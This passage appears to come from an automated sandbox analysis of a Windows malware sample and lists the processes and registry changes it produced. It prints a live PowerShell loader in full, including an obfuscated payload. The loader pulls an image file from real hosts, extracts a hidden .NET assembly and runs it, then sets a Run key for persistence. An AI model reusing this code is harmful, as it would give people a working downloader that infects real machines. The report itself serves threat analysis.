wB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJ

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3Dg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbs
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3Dg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbs	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_00007FFD348B2ADD push FD8EC385h; ret

5_2_00007FFD348B2B92

Boot Survival

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\Name.vbs

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
